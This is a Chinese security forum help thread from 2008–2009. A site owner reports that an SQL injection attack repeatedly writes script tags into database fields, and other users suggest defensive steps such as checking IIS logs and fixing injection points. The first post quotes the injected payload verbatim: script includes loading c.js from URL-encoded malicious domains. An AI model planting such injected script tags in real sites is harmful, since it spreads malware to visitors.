SQL注入攻击现象全过程（求助） - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 入侵防御（HIPS） SQL注入攻击现象全过程（求助）

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

SQL注入攻击现象全过程（求助）

xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:	发表于： 2008-12-05 17:11 \| 只看楼主短消息资料字号：小中大 1楼 SQL注入攻击现象全过程（求助）具体表现为: 网站数据库的数据表的用户信息后面被写入"！<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>" 删除了其代码又自动生成... 最新特征： 1、用户发布新信息内容后在5个小时左右，在数据表的相关字段写入“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>“ 2、删除代码后第一次在用户信息内容里被写入的是"</Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"过几个小时后写入两段就成“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>”再过几个小时后写入3段就成“.<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script><Script Src=http://c.nucl%65%61r3.com/css/c.js></Script>” 例子网站: 华派信息网(http://www.hp5e.com) 望专家尽快作出解决方案,以免更多网站受其害! 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:	分享到：

帅哥阿福雄霸杖朝狮帖子:21071 注册: 2006-03-29 来自:米兰	发表于： 2008-12-05 17:18 \| 短消息资料字号：小中大 2楼回复：SQL注入攻击现象全过程（求助） sql注入，应该与系统80端口被攻击有关，需要先清除恶意代码，之后升级杀毒软件查杀，若查杀无效，建议扫SRENG日志发这论坛来下载SRENG2.6版工具：http://www.kztechs.com/sreng/download.html SRENG工具的扫描日志操作，看这贴2楼：http://bbs.ikaka.com/showtopic-8442813.aspx ╭∩╮（︶︿︶）╭∩╮
帅哥阿福雄霸杖朝狮帖子:21071 注册: 2006-03-29 来自:米兰

安全初级工程师禁止发言帖子:898 注册: 2007-09-08 来自:Canada	发表于： 2008-12-07 10:13 \| 短消息资料字号：小中大 3楼回复：SQL注入攻击现象全过程（求助）该用户帖子内容已被屏蔽
安全初级工程师禁止发言帖子:898 注册: 2007-09-08 来自:Canada

xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:	发表于： 2008-12-09 17:40 \| 只看楼主短消息资料字号：小中大 4楼回复：SQL注入攻击现象全过程（求助）瑞星防毒墙,对这次的攻击是防不住了！
xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:

Fabregas 叱咤花甲狮帖子:2863 注册: 2008-03-01 来自:	发表于： 2008-12-09 20:16 \| 短消息资料字号：小中大 5楼回复：SQL注入攻击现象全过程（求助） SQL注入通常是通过80端口提交的一段数据库查询语句，和正常的web访问没什么区别，防毒墙一般不可能把web服务器的80端口给封了。查查 IIS的日志吧，也许能发现一些攻击的行为。当然网站如果存在SQL注入点，还是尽量检查出来并消除吧。
Fabregas 叱咤花甲狮帖子:2863 注册: 2008-03-01 来自:

不帅的阿桂初生襁褓狮帖子:24 注册: 2008-12-12 来自:	发表于： 2008-12-12 12:04 \| 短消息资料字号：小中大 6楼回复: SQL注入攻击现象全过程（求助）我和楼主一样，也遇到了这个人的功击！目前也还没有找出解决办法，请高手们帮帮忙
不帅的阿桂初生襁褓狮帖子:24 注册: 2008-12-12 来自:

银色灰烬瑞星客户俱乐部会员帖子:3212 注册: 2004-07-21 来自:	发表于： 2008-12-14 15:48 \| 短消息资料字号：小中大 7楼回复 4F xiang730988 的帖子防毒墙是硬件~~不是软件~呵呵
银色灰烬瑞星客户俱乐部会员帖子:3212 注册: 2004-07-21 来自:

安全初级工程师禁止发言帖子:898 注册: 2007-09-08 来自:Canada	发表于： 2009-02-15 14:51 \| 短消息资料字号：小中大 8楼回复：SQL注入攻击现象全过程（求助）该用户帖子内容已被屏蔽
安全初级工程师禁止发言帖子:898 注册: 2007-09-08 来自:Canada

ghgb721 初生襁褓狮帖子:13 注册: 2009-02-13 来自:	发表于： 2009-02-15 17:37 \| 短消息资料字号：小中大 9楼回复：SQL注入攻击现象全过程（求助）我也有这毛病
ghgb721 初生襁褓狮帖子:13 注册: 2009-02-13 来自:

暴走一小时健康舞勺狮帖子:268 注册: 2005-05-19 来自:天之涯	发表于： 2009-02-15 19:14 \| 短消息资料字号：小中大 10楼回复：SQL注入攻击现象全过程（求助） keesun 的自身代码不完善～你应该去找他们～
暴走一小时健康舞勺狮帖子:268 注册: 2005-05-19 来自:天之涯

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT